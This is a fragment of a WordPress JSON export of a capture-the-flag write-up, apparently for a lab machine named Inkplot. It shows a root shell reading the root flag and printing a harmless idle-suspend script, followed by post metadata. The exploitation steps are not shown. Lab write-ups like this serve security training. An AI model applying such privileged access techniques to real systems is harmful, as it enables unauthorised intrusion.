.zshrc\nbash-5.2# cat root.txt \n4d9089c262be4a03e3ebfdaff0a8f7c6\nbash-5.2# cd .local\/\nbash-5.2# ls -la\ntotal 16\ndrwxr-xr-x 3 root root 4096 Aug  1  2023 .\ndrwx------ 6 root root 4096 Aug  3  2023 ..\ndrwx------ 3 root root 4096 Jul 22  2023 share\n-rwxr-xr-x 1 root root  218 Aug  1  2023 suspend.sh\nbash-5.2# cat suspend.sh \n#!\/bin\/bash\n\nwhile true ; do\n  TIME=$(w -o |grep &quot;pauline&quot; | awk &#039;{print $5}&#039;)\n  if [[ $TIME != &quot;-zsh&quot; ]] ; then\n    TIME=${TIME%%:*}\n    if [[ $TIME -gt 1 ]] ; then\n      systemctl suspend\n    fi\n  fi\n  sleep 5\ndone<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Inkplot Information Gathering Port Scan rustscan -a 192.168.0.147 &#8212; -A Open  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-604","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/604","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=604"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/604\/revisions"}],"predecessor-version":[{"id":605,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/604\/revisions\/605"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=604"}],"wp:term":[{"taxonom
y":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=604"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=604"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}